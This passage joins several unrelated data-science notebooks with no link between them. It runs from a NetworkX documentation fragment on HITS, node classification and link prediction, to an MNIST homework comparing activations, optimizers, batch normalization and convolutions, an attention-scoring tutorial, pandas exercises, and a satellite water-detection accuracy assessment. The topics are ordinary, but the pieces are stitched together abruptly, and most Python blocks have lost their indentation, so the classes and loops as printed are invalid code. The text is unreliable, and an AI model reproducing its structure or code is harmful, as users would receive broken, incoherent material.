- ```authority_matrix(G[, nodelist])``` Returns the HITS authority matrix.
```
nx.hits(G)
nx.hub_matrix(G)
nx.authority_matrix(G)
```
----------------
### Node Classification
This module provides functions for the node classification problem.
The functions in this module are not imported into the top-level networkx namespace. You can access these functions by importing the ```networkx.algorithms.node_classification``` module, then accessing the functions as attributes of ```node_classification```. For example:
```
import networkx as nx
from networkx.algorithms import node_classification
G = nx.balanced_tree(3,3)
nx.draw(G, node_size = 500, node_color = "lightgreen", with_labels = True)
G.nodes[1]['label'] = 'A'  # G.node was renamed to G.nodes in NetworkX 2.x
G.nodes[2]['label'] = 'B'
G.nodes[3]['label'] = 'C'
L = node_classification.harmonic_function(G)
print(L)
LL = {}
for n,l in zip(G.nodes(),L):
LL.update({n:l})
nx.draw(G, node_size = 500, labels = LL, node_color = "lightgreen", with_labels = True)
```
--------------
### Link Prediction
Link prediction algorithms.
- ```resource_allocation_index(G[, ebunch])``` Compute the resource allocation index of all node pairs in ebunch.
- ```jaccard_coefficient(G[, ebunch])``` Compute the Jaccard coefficient of all node pairs in ebunch.
- ```adamic_adar_index(G[, ebunch])``` Compute the Adamic-Adar index of all node pairs in ebunch.
- ```preferential_attachment(G[, ebunch])``` Compute the preferential attachment score of all node pairs in ebunch.
- ```cn_soundarajan_hopcroft(G[, ebunch, community])``` Count the number of common neighbors of all node pairs in ebunch using community information.
- ```ra_index_soundarajan_hopcroft(G[, ebunch, …])``` Compute the resource allocation index of all node pairs in ebunch using community information.
- ```within_inter_cluster(G[, ebunch, delta, …])``` Compute the ratio of within- and inter-cluster common neighbors of all node pairs in ebunch.
```
G = nx.karate_club_graph()
nx.draw(G, node_size = 500, node_color = "lightblue", with_labels = True)
preds = nx.resource_allocation_index(G, [(0,10),(9, 18), (11, 12),(30,27),(16,26)])
for u, v, p in preds:
print('(%d, %d) -> %.8f' % (u, v, p))
```
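The other predictors in the list are used the same way. For example, the Jaccard coefficient is just the size of the common-neighbor set over the size of the neighbor union, which we can verify by hand:

```python
import networkx as nx

G = nx.karate_club_graph()

for u, v, p in nx.jaccard_coefficient(G, [(0, 10)]):
    # |common neighbors| / |union of neighbors|
    manual = len(set(G[u]) & set(G[v])) / len(set(G[u]) | set(G[v]))
    print('(%d, %d) -> %.8f (by hand: %.8f)' % (u, v, p, manual))
```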
# **[HW2] Training Neural Network**
1. Prerequisite
2. Activation
3. Optimizer
4. Regularization
5. FC vs Conv
6. Do it by yourself
In this exercise, we will swap out the components of the MLP covered last time one at a time, to get a feel for the importance of the activation function, optimizer, regularization, and convolution layers.
# 1. Prerequisite
Before starting the main exercise, just as in [HW1.2 Logistic Regression vs MLP], we will create the DataLoader and Trainer classes for the MNIST dataset.
## Import packages
Change the runtime type:
in the top menu, select [Runtime] -> [Change runtime type] -> [Hardware accelerator] -> [GPU].
After the change, running the cell below should show that torch.cuda.is_available() returns True.
```
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torch.optim as optim
from torch.utils import data
print(torch.__version__)
print(torch.cuda.is_available())
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
from sklearn.datasets import fetch_openml
from sklearn.model_selection import train_test_split
np.set_printoptions(precision=3)
np.set_printoptions(suppress=True)
```
## Load Dataset
```
mnist = fetch_openml('mnist_784', cache=False)
X = mnist.data.astype('float32').values
y = mnist.target.astype('int64').values
X /= 255.0
print(X.shape)
print(y.shape)
```
## Split Dataset
Split the data into training and evaluation datasets.
```
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)
print(X_train.shape)
print(y_train.shape)
print(X_test.shape)
print(y_test.shape)
```
## Pytorch Dataset
```
class CustomDataset(torch.utils.data.Dataset):
def __init__(self, X, y):
super(CustomDataset, self).__init__()
self.X = X
self.y = y
def __getitem__(self, index):
x = self.X[index]
y = self.y[index]
x = torch.from_numpy(x).float()
y = torch.from_numpy(np.array(y)).long()
return x, y
def __len__(self):
return len(self.X)
train_dataset = CustomDataset(X_train, y_train)
test_dataset = CustomDataset(X_test, y_test)
print(len(train_dataset))
print(train_dataset.X.shape)
print(len(test_dataset))
print(test_dataset.X.shape)
```
## DataLoader
```
batch_size = 64
# shuffle the train data
train_dataloader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
# do not shuffle the val & test data
test_dataloader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False)
# dataset size // batch_size
print(len(train_dataloader))
print(len(test_dataloader))
```
## Trainer
```
class Trainer():
def __init__(self, trainloader, testloader, model, optimizer, criterion, device):
"""
trainloader: train data's loader
testloader: test data's loader
model: model to train
optimizer: optimizer to update your model
criterion: loss function
"""
self.trainloader = trainloader
self.testloader = testloader
self.model = model
self.optimizer = optimizer
self.criterion = criterion
self.device = device
def train(self, epoch = 1):
self.model.train()
for e in range(epoch):
running_loss = 0.0
for i, data in enumerate(self.trainloader, 0):
inputs, labels = data
# move the input tensors to the GPU device
inputs = inputs.to(self.device)
labels = labels.to(self.device)
# zero the parameter gradients
self.optimizer.zero_grad()
# forward + backward + optimize
outputs = self.model(inputs)
loss = self.criterion(outputs, labels)
loss.backward()
self.optimizer.step()
running_loss += loss.item()
print('epoch: %d loss: %.3f' % (e + 1, running_loss / len(self.trainloader)))
running_loss = 0.0
def test(self):
self.model.eval()
correct = 0
for inputs, labels in self.testloader:
inputs = inputs.to(self.device)
labels = labels.to(self.device)
output = self.model(inputs)
pred = output.max(1, keepdim=True)[1] # get the index of the max
correct += pred.eq(labels.view_as(pred)).sum().item()
test_acc = correct / len(self.testloader.dataset)
print('test_acc: %.3f' %(test_acc))
```
# 2. Activation Function
In this section, we will try out and compare the two most commonly used activation functions: sigmoid and ReLU.

- input: 784
- hidden: 32 or (32, 32)
- output: 10
- **activation: sigmoid or relu**
- optimizer: sgd
- loss: cross-entropy
## 2-layer Network + Sigmoid
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=32,
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim)
self.fc2 = nn.Linear(hidden_dim, output_dim)
def forward(self, x):
x = self.fc1(x)
x = F.sigmoid(x)
x = self.fc2(x)
return x
model = MLP()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.01)
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
## 2-layer Network + ReLU
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=32,
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim)
self.fc2 = nn.Linear(hidden_dim, output_dim)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
return x
model = MLP()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.01)
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
#### Q1. Does performance differ depending on the activation function? If so, why does the difference occur?
## 3-layer Network + Sigmoid
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=(32,32),
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim[0])
self.fc2 = nn.Linear(hidden_dim[0], hidden_dim[1])
self.fc3 = nn.Linear(hidden_dim[1], output_dim)
def forward(self, x):
x = self.fc1(x)
x = F.sigmoid(x)
x = self.fc2(x)
x = F.sigmoid(x)
x = self.fc3(x)
return x
model = MLP()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.01)
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
## 3-layer Network + ReLU
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=(32,32),
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim[0])
self.fc2 = nn.Linear(hidden_dim[0], hidden_dim[1])
self.fc3 = nn.Linear(hidden_dim[1], output_dim)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
x = F.relu(x)
x = self.fc3(x)
return x
model = MLP()
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(model.parameters(), lr=0.01)
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
#### Q2. For each activation function, how does performance change as the number of layers increases? If the patterns differ, why?
#### Q3. What would happen if there were no activation function at all?
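A quick way to build intuition for Q3: with no activation between them, stacked linear layers collapse into a single linear layer, so depth adds no expressive power. A numpy sketch with hypothetical weight shapes matching the MLP above (biases omitted for brevity):

```python
import numpy as np

rng = np.random.default_rng(0)
W1 = rng.normal(size=(32, 784))  # fc1 weights
W2 = rng.normal(size=(10, 32))   # fc2 weights
x = rng.normal(size=784)

# Two linear layers applied in sequence ...
two_layers = W2 @ (W1 @ x)
# ... equal one linear layer with the combined weight matrix
one_layer = (W2 @ W1) @ x

print(np.allclose(two_layers, one_layer))  # True
```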
# 3. Optimization
In this section, we will try optimizers such as SGD, momentum, and Adam, and compare their performance.

- input: 784
- hidden: (32, 32)
- output: 10
- activation: relu
- **optimizer: sgd or momentum or adam**
- loss: cross-entropy
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=(32,32),
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim[0])
self.fc2 = nn.Linear(hidden_dim[0], hidden_dim[1])
self.fc3 = nn.Linear(hidden_dim[1], output_dim)
def forward(self, x):
x = self.fc1(x)
x = F.relu(x)
x = self.fc2(x)
x = F.relu(x)
x = self.fc3(x)
return x
```
## 3-layer Network + ReLU + SGD
```
model = MLP()
optimizer = optim.SGD(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
## 3-layer Network + ReLU + Momentum
```
model = MLP()
optimizer = optim.SGD(model.parameters(), lr=0.01, momentum=0.99)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
## 3-layer Network + ReLU + Adam
```
model = MLP()
optimizer = optim.Adam(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
#### Q4. How does the convergence speed differ across optimizers?
##### Q4.1 If the convergence speeds differ, why is there a difference between SGD and momentum?
##### Q4.2 If the convergence speeds differ, why is there a difference between momentum and Adam?
## 4. Regularization
In this section, we will look at how to use batch normalization, which is widely used with image data.

- input: 784
- hidden: 32 or (32, 32)
- output: 10
- activation: relu
- optimizer: adam
- **regularizer: batch_norm**
- loss: cross-entropy
## 3-layer Network + ReLU + Adam + batch_norm
```
class MLP(nn.Module):
def __init__(self,
input_dim=784,
hidden_dim=(32,32),
output_dim=10):
super(MLP, self).__init__()
self.fc1 = nn.Linear(input_dim, hidden_dim[0])
self.bn1 = nn.BatchNorm1d(hidden_dim[0])
self.fc2 = nn.Linear(hidden_dim[0], hidden_dim[1])
self.bn2 = nn.BatchNorm1d(hidden_dim[1])
self.fc3 = nn.Linear(hidden_dim[1], output_dim)
def forward(self, x):
x = self.fc1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.fc2(x)
x = self.bn2(x)
x = F.relu(x)
x = self.fc3(x)
return x
model = MLP()
optimizer = optim.Adam(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
def count_parameters(model):
print(sum(p.numel() for p in model.parameters() if p.requires_grad))
return sum(p.numel() for p in model.parameters() if p.requires_grad)
count_parameters(model)
```
#### Q5. How did performance change before and after applying batch normalization? Why did this change occur?
# 5. Fully-Connected Layer vs Convolution Layer
So far, we have swapped out various parts of the model and observed how MNIST performance changes.
Although a fully connected network has no trouble achieving high accuracy on MNIST, building every layer as a fully connected layer requires an enormous number of parameters and computations, so it is not well suited to larger, higher-resolution image data.
In this section, we will therefore use convolution layers, which are the standard choice for image data, and see how the parameter count and performance change.
## Convolution Operation

### Q6. If the input is (H, W, C) and we apply 2 convolutional filters of size (F * F) with stride S, what is the output shape?
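As a hint for Q6: for a valid (no-padding) convolution, the spatial output size per dimension is `(size - kernel) // stride + 1`, and the channel count equals the number of filters. A quick check with the kernel sizes used in the model below:

```python
def conv_out(size, kernel, stride):
    # Spatial output size of a valid (no-padding) convolution
    return (size - kernel) // stride + 1

# 28x28 MNIST images through two 7x7, stride-2 convolutions:
h = conv_out(28, 7, 2)  # 11
h = conv_out(h, 7, 2)   # 3
print(h)  # matches the 3*3*8 flattened size used in the model
```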
```
class Conv(nn.Module):
def __init__(self,
input_dim=784,
output_dim=10):
super(Conv, self).__init__()
self.conv1 = nn.Conv2d(in_channels=1,
out_channels=8,
kernel_size=7,
stride=2)
self.conv2 = nn.Conv2d(in_channels=8,
out_channels=8,
kernel_size=7,
stride=2)
self.fc = nn.Linear(3*3*8, output_dim)
def forward(self, x):
# should reshape data into image
x = x.reshape(-1, 1, 28, 28)
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = x.reshape(-1, 3*3*8)
x = self.fc(x)
return x
model = Conv()
optimizer = optim.Adam(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
count_parameters(model)
```
##### Q7. In what ways is the convolution operation more effective than a fully connected layer for handling image data?
## 6. Do It By Yourself
Referring to the exercises above and the various network components covered in class, try to achieve 98% accuracy with 20,000 or fewer parameters!
```
class CustomModel(nn.Module):
def __init__(self,
input_dim=784,
output_dim=10):
super(CustomModel, self).__init__()
# [64, 1, 28, 28] => [64, 3, 22, 22]
self.conv1 = nn.Conv2d(in_channels=1,
out_channels=3,
kernel_size=7,
stride=1)
self.bn1 = nn.BatchNorm2d(3)
# [64, 3, 22, 22] => [64, 7, 16, 16]
self.conv2 = nn.Conv2d(in_channels=3,
out_channels=7,
kernel_size=7,
stride=1)
self.bn2 = nn.BatchNorm2d(7)
self.fc = nn.Linear(16*16*7, output_dim)
def forward(self, x):
# should reshape data into image
x = x.reshape(-1, 1, 28, 28)
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x)
x = self.conv2(x)
x = self.bn2(x)
x = F.relu(x)
x = x.reshape(-1, 16*16*7)
x = self.fc(x)
return x
model = CustomModel()
count_parameters(model)
optimizer = optim.Adam(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
device = torch.device('cuda')
model.to(device)
trainer = Trainer(trainloader = train_dataloader,
testloader = test_dataloader,
model = model,
criterion = criterion,
optimizer = optimizer,
device = device)
trainer.train(epoch = 10)
trainer.test()
```
# Attention Basics
In this notebook, we look at how attention is implemented. We will focus on implementing attention in isolation from a larger model. That's because when implementing attention in a real-world model, a lot of the focus goes into piping the data and juggling the various vectors rather than the concepts of attention themselves.
We will implement attention scoring as well as calculating an attention context vector.
## Attention Scoring
### Inputs to the scoring function
Let's start by looking at the inputs we'll give to the scoring function. We will assume we're in the first step of the decoding phase. The first input to the scoring function is the hidden state of the decoder (assuming a toy RNN with three hidden nodes -- not usable in real life, but easier to illustrate):
```
dec_hidden_state = [5,1,20]
```
Let's visualize this vector:
```
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# Let's visualize our decoder hidden state
plt.figure(figsize=(1.5, 4.5))
sns.heatmap(np.transpose(np.matrix(dec_hidden_state)), annot=True, cmap=sns.light_palette("purple", as_cmap=True), linewidths=1)
```
Our first scoring function will score a single annotation (encoder hidden state), which looks like this:
```
annotation = [3,12,45] #e.g. Encoder hidden state
# Let's visualize the single annotation
plt.figure(figsize=(1.5, 4.5))
sns.heatmap(np.transpose(np.matrix(annotation)), annot=True, cmap=sns.light_palette("orange", as_cmap=True), linewidths=1)
```
### IMPLEMENT: Scoring a Single Annotation
Let's calculate the dot product of the decoder hidden state with a single annotation. NumPy's [dot()](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) is a good candidate for this operation.
```
def single_dot_attention_score(dec_hidden_state, enc_hidden_state):
# TODO: return the dot product of the two vectors
return
single_dot_attention_score(dec_hidden_state, annotation)
```
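One possible solution (kept out of the exercise cell above so you can try it yourself first): the score is simply `np.dot` of the two vectors.

```python
import numpy as np

dec_hidden_state = [5, 1, 20]
annotation = [3, 12, 45]

def single_dot_attention_score(dec_hidden_state, enc_hidden_state):
    # Dot product of the decoder hidden state and one encoder annotation
    return np.dot(dec_hidden_state, enc_hidden_state)

score = single_dot_attention_score(dec_hidden_state, annotation)
print(score)  # 927
```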
### Annotations Matrix
Let's now look at scoring all the annotations at once. To do that, here's our annotation matrix:
```
annotations = np.transpose([[3,12,45], [59,2,5], [1,43,5], [4,3,45.3]])
```
And it can be visualized like this (each column is a hidden state of an encoder time step):
```
# Let's visualize our annotation (each column is an annotation)
ax = sns.heatmap(annotations, annot=True, cmap=sns.light_palette("orange", as_cmap=True), linewidths=1)
```
### IMPLEMENT: Scoring All Annotations at Once
Let's calculate the scores of all the annotations in one step using matrix multiplication. Let's continue to use the dot scoring method.
<img src="images/scoring_functions.png" />
To do that, we'll have to transpose `dec_hidden_state` and [matrix multiply](https://docs.scipy.org/doc/numpy/reference/generated/numpy.matmul.html) it with `annotations`.
```
def dot_attention_score(dec_hidden_state, annotations):
# TODO: return the product of dec_hidden_state transpose and annotations
return
attention_weights_raw = dot_attention_score(dec_hidden_state, annotations)
attention_weights_raw
```
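A possible implementation: matrix-multiplying the (3,) decoder state with the (3, 4) annotations matrix yields one score per annotation.

```python
import numpy as np

dec_hidden_state = [5, 1, 20]
annotations = np.transpose([[3, 12, 45], [59, 2, 5], [1, 43, 5], [4, 3, 45.3]])

def dot_attention_score(dec_hidden_state, annotations):
    # (3,) @ (3, 4) -> (4,): one dot-product score per annotation column
    return np.matmul(np.transpose(dec_hidden_state), annotations)

scores = dot_attention_score(dec_hidden_state, annotations)
print(scores)  # approximately [927. 397. 148. 929.]
```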
Looking at these scores, can you guess which of the four vectors will get the most attention from the decoder at this time step?
## Softmax
Now that we have our scores, let's apply softmax:
<img src="images/softmax.png" />
```
def softmax(x):
x = np.array(x, dtype=np.float128)
e_x = np.exp(x)
return e_x / e_x.sum(axis=0)
attention_weights = softmax(attention_weights_raw)
attention_weights
```
Even when we know which annotation will get the most focus, it's interesting to see how drastically softmax sharpens the scores. The first and last annotations had respective scores of 927 and 929, but after softmax the attention they receive is 0.12 and 0.88 respectively.
# Applying the scores back on the annotations
Now that we have our scores, let's multiply each annotation by its score to move closer to the attention context vector. This is the multiplication part of this formula (we'll tackle the summation part in the later cells):
<img src="images/Context_vector.png" />
```
def apply_attention_scores(attention_weights, annotations):
    # TODO: Multiply the annotations by their weights
return
applied_attention = apply_attention_scores(attention_weights, annotations)
applied_attention
```
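A possible implementation: numpy broadcasting scales each column (annotation) by its weight, since `attention_weights` has shape (4,) and `annotations` has shape (3, 4). Here the weights are made-up round numbers close to the softmax output described above.

```python
import numpy as np

annotations = np.transpose([[3, 12, 45], [59, 2, 5], [1, 43, 5], [4, 3, 45.3]])
attention_weights = np.array([0.12, 0.0, 0.0, 0.88])  # roughly the softmax output

def apply_attention_scores(attention_weights, annotations):
    # Broadcasting multiplies each column of annotations by its weight
    return attention_weights * annotations

applied = apply_attention_scores(attention_weights, annotations)
print(np.round(applied, 2))
```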
Let's visualize how the context vector looks now that we've applied the attention scores back on it:
```
# Let's visualize our annotations after applying attention to them
ax = sns.heatmap(applied_attention, annot=True, cmap=sns.light_palette("orange", as_cmap=True), linewidths=1)
```
Contrast this with the raw annotations visualized earlier in the notebook, and we can see that the second and third annotations (columns) have been nearly wiped out. The first annotation maintains some of its value, and the fourth annotation is the most pronounced.
# Calculating the Attention Context Vector
All that remains now is to sum up the four columns to produce a single attention context vector:
```
def calculate_attention_vector(applied_attention):
return np.sum(applied_attention, axis=1)
attention_vector = calculate_attention_vector(applied_attention)
attention_vector
# Let's visualize the attention context vector
plt.figure(figsize=(1.5, 4.5))
sns.heatmap(np.transpose(np.matrix(attention_vector)), annot=True, cmap=sns.light_palette("Blue", as_cmap=True), linewidths=1)
```
Now that we have the context vector, we can concatenate it with the hidden state and pass it through a hidden layer to produce the result of this decoding time step.
# Introduction to Pandas
Complete the following set of exercises to solidify your knowledge of Pandas fundamentals.
#### 1. Import Numpy and Pandas and alias them to `np` and `pd` respectively.
```
# your code here
import numpy as np
import pandas as pd
```
#### 2. Create a Pandas Series containing the elements of the list below.
```
lst = [5.7, 75.2, 74.4, 84.0, 66.5, 66.3, 55.8, 75.7, 29.1, 43.7]
# your code here
lstseries = pd.Series(lst)
print(lstseries)
```
#### 3. Use indexing to return the third value in the Series above.
*Hint: Remember that indexing begins at 0.*
```
# your code here
print(lstseries[2])
```
#### 4. Create a Pandas DataFrame from the list of lists below. Each sublist should be represented as a row.
```
b = [[53.1, 95.0, 67.5, 35.0, 78.4],
[61.3, 40.8, 30.8, 37.8, 87.6],
[20.6, 73.2, 44.2, 14.6, 91.8],
[57.4, 0.1, 96.1, 4.2, 69.5],
[83.6, 20.5, 85.4, 22.8, 35.9],
[49.0, 69.0, 0.1, 31.8, 89.1],
[23.3, 40.7, 95.0, 83.8, 26.9],
[27.6, 26.4, 53.8, 88.8, 68.5],
[96.6, 96.4, 53.4, 72.4, 50.1],
[73.7, 39.0, 43.2, 81.6, 34.7]]
# your code here
bdf = pd.DataFrame(b)
print(bdf)
```
#### 5. Rename the data frame columns based on the names in the list below.
```
colnames = ['Score_1', 'Score_2', 'Score_3', 'Score_4', 'Score_5']
# your code here
bdf.columns = colnames
print(bdf)
```
#### 6. Create a subset of this data frame that contains only the Score 1, 3, and 5 columns.
```
# your code here
newbdf = bdf[['Score_1','Score_3','Score_5']]
print(newbdf)
```
#### 7. From the original data frame, calculate the average Score_3 value.
```
# your code here
bdf['Score_3'].mean()
```
#### 8. From the original data frame, calculate the maximum Score_4 value.
```
# your code here
bdf['Score_4'].max()
```
#### 9. From the original data frame, calculate the median Score 2 value.
```
# your code here
bdf['Score_2'].median()
```
#### 10. Create a Pandas DataFrame from the dictionary of product orders below.
```
orders = {'Description': ['LUNCH BAG APPLE DESIGN',
'SET OF 60 VINTAGE LEAF CAKE CASES ',
'RIBBON REEL STRIPES DESIGN ',
'WORLD WAR 2 GLIDERS ASSTD DESIGNS',
'PLAYING CARDS JUBILEE UNION JACK',
'POPCORN HOLDER',
'BOX OF VINTAGE ALPHABET BLOCKS',
'PARTY BUNTING',
'JAZZ HEARTS ADDRESS BOOK',
'SET OF 4 SANTA PLACE SETTINGS'],
'Quantity': [1, 24, 1, 2880, 2, 7, 1, 4, 10, 48],
'UnitPrice': [1.65, 0.55, 1.65, 0.18, 1.25, 0.85, 11.95, 4.95, 0.19, 1.25],
'Revenue': [1.65, 13.2, 1.65, 518.4, 2.5, 5.95, 11.95, 19.8, 1.9, 60.0]}
# your code here
ordersdf = pd.DataFrame(orders)
# x.head()
print(ordersdf)
```
#### 11. Calculate the total quantity ordered and revenue generated from these orders.
```
# your code here
total_qty = ordersdf['Quantity'].sum()
print(total_qty)
total_revenue = ordersdf['Revenue'].sum()
print(total_revenue)
```
#### 12. Obtain the prices of the most expensive and least expensive items ordered and print the difference.
```
# your code here
expensive = ordersdf['UnitPrice'].max()
print(expensive)
affordable = ordersdf['UnitPrice'].min()
print(affordable)
diff = expensive - affordable
print(diff)
```
# Seasonal Accuracy Assessment of Water Observations from Space (WOfS) Product in Africa<img align="right" src="../Supplementary_data/DE_Africa_Logo_Stacked_RGB_small.jpg">
## Description
Now that we have run the WOfS classification for each AEZ in Africa, it's time to conduct a seasonal accuracy assessment for each AEZ, using the validation data already compiled and stored in the following folder: `Results/WOfS_Assessment/Point_Based/ValidPoints_Per_AEZ`.
Accuracy assessment for the WOfS product in Africa involves generating a confusion error matrix for a binary WOFL classification.
The inputs for estimating the accuracy of the WOfS-derived product are a binary WOFL classification layer showing water/non-water and a shapefile containing validation points collected with the [Collect Earth Online](https://collect.earth/) tool. The validation points are the ground truth (actual) data, while the value extracted from the WOFL at each location is the predicted value.
This notebook explains how to perform a seasonal accuracy assessment of WOfS, starting with the `Western` AEZ, using the collected ground truth dataset. It outputs a confusion error matrix containing the overall, producer's, and user's accuracy, along with the F1 score for each class.
## Getting started
To run this analysis, run all the cells in the notebook, starting with the "Load packages" cell.
### Load packages
Import Python packages that are used for the analysis.
```
%matplotlib inline
import sys
import os
import rasterio
import xarray
import glob
import numpy as np
import pandas as pd
import seaborn as sn
import geopandas as gpd
import matplotlib.pyplot as plt
import scipy, scipy.ndimage
import warnings
warnings.filterwarnings("ignore") #this will suppress the warnings for multiple UTM zones in your AOI
sys.path.append("../Scripts")
from geopandas import GeoSeries, GeoDataFrame
from shapely.geometry import Point
from sklearn.metrics import confusion_matrix, accuracy_score
from sklearn.metrics import plot_confusion_matrix, f1_score
from deafrica_plotting import map_shapefile,display_map, rgb
from deafrica_spatialtools import xr_rasterize
from deafrica_datahandling import wofs_fuser, mostcommon_crs,load_ard,deepcopy
from deafrica_dask import create_local_dask_cluster
```
### Analysis Parameters
- CEO : ground truth points that are valid in each AEZ, containing the WOfS-assigned classes, the WOfS clear observations, and the labels identified by an analyst for each calendar month
- input_data : dataframe for further analysis and accuracy assessment
### Load the Dataset
Validation points that are valid for each AEZ
```
#Read the valid ground truth data
CEO = 'Results/WOfS_Assessment/Point_Based/ValidPoints_Per_AEZ/ValidationPoints_Western.csv'
df = pd.read_csv(CEO,delimiter=",")
#explore the dataframe
df.columns
#rename a column in dataframe
input_data = df.drop(['Unnamed: 0'], axis=1)
input_data = input_data.rename(columns={'WATERFLAG':'ACTUAL'})
#The table contains each calendar month as well as the CEO and WOfS labels for each validation point
input_data
#Counting the number of rows in valid points dataframe
count = input_data.groupby('PLOT_ID',as_index=False,sort=False).last()
count
```
From the table, select the rows that fall in the wet season and those that fall in the dry season, then save them in separate tables.
```
#setting the months that are identified as wet in the AEZ using Climatology dataset
WetMonth = [5,6,7,8,9,10]
#identifying the points that are in wet season and counting their numbers
Wet_Season = input_data[input_data['MONTH'].isin(WetMonth)]
count_Wet_Season = Wet_Season.groupby('PLOT_ID',as_index=False,sort=False).last()
count_Wet_Season
#setting the months that are identified as dry in the AEZ using Climatology dataset then counting the points that are in dry season
Dry_Season = input_data[~input_data['MONTH'].isin(WetMonth)]
count_Dry_Season = Dry_Season.groupby('PLOT_ID',as_index=False,sort=False).last()
count_Dry_Season
```
As the point counts show, some points appear in both the dry and wet seasons.
### Create a Confusion Matrix
```
confusion_matrix = pd.crosstab(Wet_Season['ACTUAL'],Wet_Season['PREDICTION'],rownames=['ACTUAL'],colnames=['PREDICTION'],margins=True)
confusion_matrix
```
`Producer's Accuracy` is the map-maker's accuracy: the probability that a certain class on the ground is classified correctly. Producer's accuracy is the complement of the omission error.
```
confusion_matrix["Producer's"] = [confusion_matrix.loc[0][0] / confusion_matrix.loc[0]['All'] * 100, confusion_matrix.loc[1][1] / confusion_matrix.loc[1]['All'] *100, np.nan]
confusion_matrix
```
`User's Accuracy` is the map-user accuracy, showing how often a class on the map is actually present on the ground; it indicates the map's reliability. It is calculated as the number of correctly classified sites for a particular class over the total number of sites classified as that class.
```
users_accuracy = pd.Series([confusion_matrix[0][0] / confusion_matrix[0]['All'] * 100,
confusion_matrix[1][1] / confusion_matrix[1]['All'] * 100]).rename("User's")
confusion_matrix = confusion_matrix.append(users_accuracy)
confusion_matrix
```
`Overall Accuracy` shows what proportion of the reference (actual) sites were mapped correctly.
```
confusion_matrix.loc["User's", "Producer's"] = (confusion_matrix[0][0] + confusion_matrix[1][1]) / confusion_matrix['All']['All'] * 100
confusion_matrix
input_data['PREDICTION'] = input_data['PREDICTION'].astype(str).astype(int)
```
The F1 score is the harmonic mean of precision and recall; it reaches its best value at 1 (perfect precision and recall) and is calculated as F1 = 2 × (precision × recall) / (precision + recall):
```
fscore = pd.Series([(2*(confusion_matrix.loc["User's"][0]*confusion_matrix.loc[0]["Producer's"]) / (confusion_matrix.loc["User's"][0] + confusion_matrix.loc[0]["Producer's"])) / 100,
f1_score(input_data['ACTUAL'],input_data['PREDICTION'])]).rename("F-score")
confusion_matrix = confusion_matrix.append(fscore)
confusion_matrix
confusion_matrix = confusion_matrix.round(decimals=2)
confusion_matrix = confusion_matrix.rename(columns={'0':'NoWater','1':'Water', 0:'NoWater',1:'Water','All':'Total'},index={'0':'NoWater','1':'Water',0:'NoWater',1:'Water','All':'Total'})
confusion_matrix
